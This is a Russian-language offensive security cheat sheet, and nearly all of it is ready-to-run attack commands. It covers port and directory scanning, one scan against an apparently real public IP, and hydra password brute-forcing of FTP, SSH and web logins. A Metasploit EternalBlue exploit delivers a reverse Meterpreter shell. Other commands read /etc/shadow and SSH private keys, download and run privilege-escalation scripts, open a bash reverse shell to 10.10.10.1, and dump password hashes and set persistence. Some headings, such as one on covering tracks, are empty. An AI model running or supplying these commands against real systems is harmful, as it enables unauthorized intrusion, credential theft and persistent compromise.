📘 Шпаргалка Akira

🔎 Сканирование (Scan)

nmap -sC -sV -v 129.168.0.1

🌐 Директории и фаззинг

ffuf -u http://34.142.227.227/FUZZ -w directory-list-big.txt -fs 83978 -s
dirsearch -u http://34.142.227.227/ -w directory-list-big.txt --exclude-sizes=83978 --quiet

⚙️ Основные порты и сервисы

ПортСервисОписание
21FTPАнонимный доступ / brute
22SSHWeak логины / OS detection
23TelnetЧасто слабо защищён
25SMTPРелей / утечки инфы
53DNSЗоны / DNS-трансфер
80HTTPВеб-фаззинг / CMS
443HTTPSSSL-скан / веб-приложения
445SMBShares / EternalBlue
3306MySQLПароли / инфа
3389RDPBlueKeep / визуальный доступ

🛠️ Утилиты и команды

nikto — сканер веб-уязвимостей

nikto -h https://target.com -p 443
nikto -h http://target.com -Tuning x

whatweb — CMS и технологии сайта

whatweb http://target.com
whatweb -v --color=never -a 3 http://target.com

hydra — брутфорс логинов/паролей

hydra -l admin -P passwords.txt ftp://target.com
hydra -l root -P rockyou.txt ssh://192.168.1.1
hydra -L users.txt -P passwords.txt http-get://site.com/login

gobuster — альтернатива ffuf

gobuster dir -u http://target.com -w wordlist.txt
gobuster dns -d target.com -w subdomains.txt

smbclient — работа с SMB

smbclient //192.168.1.10/share -U guest
smbclient -L //192.168.1.10 -N

enum4linux — сбор инфы с Windows

enum4linux -a 192.168.1.10

msfconsole — Metasploit Framework

search exploit smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit

🧨 Повышение привилегий (Privilege Escalation)

Linux

find / -perm -4000 2>/dev/null
ls -la /etc/passwd /etc/shadow
sudo -l
crontab -l && ls -la /etc/cron*
cat ~/.bash_history
echo $PATH
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh

Windows

net users
wmic product get name
whoami /priv
net localgroup administrators
# Поиск паролей:
dir /s *.bat *.ps1 *.config
# PowerUp:
DownloadString("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1")
Invoke-AllChecks

🎯 Post-Exploitation

hostname
ifconfig / ip a
route
ps aux / tasklist
netstat -anp / Get-NetTCPConnection
grep -i pass /etc/*
cat ~/.ssh/id_rsa

💡 Обратный шелл на Bash

bash -i >& /dev/tcp/10.10.10.1/4444 0>&1

💻 Meterpreter

meterpreter > sysinfo
meterpreter > hashdump
meterpreter > upload / download
meterpreter > persistence

📦 Инструменты Post-Exploitation

🎭 Социальная инженерия

setoolkit  # Social-Engineer Toolkit

📡 Wi-Fi атаки

🕵️ OSINT (разведка по открытым источникам)

theHarvester -d target.com -b all

🔧 Полезные утилиты

🚨 Эксплуатация Web-приложений

sqlmap -u "http://target.com/index.php?id=1" --batch --dbs

🛡 Безопасность и заметание следов